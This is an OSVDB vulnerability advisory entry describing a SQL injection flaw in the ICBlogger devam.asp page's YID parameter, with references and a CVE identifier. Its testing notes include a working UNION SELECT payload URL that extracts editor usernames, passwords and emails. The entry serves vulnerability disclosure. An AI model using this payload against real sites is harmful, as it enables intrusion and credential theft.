ICBlogger devam.asp YID Variable SQL Injection

2006-09-01T09:04:04
ID OSVDB:28432
Type osvdb
Reporter OSVDB
Modified 2006-09-01T09:04:04

Description

Manual Testing Notes

http://[target]/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1

References:

Vendor URL: http://www.icblogger.com/
Secunia Advisory ID: 21741
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0008.html
FrSIRT Advisory: ADV-2006-3441
CVE-2006-4597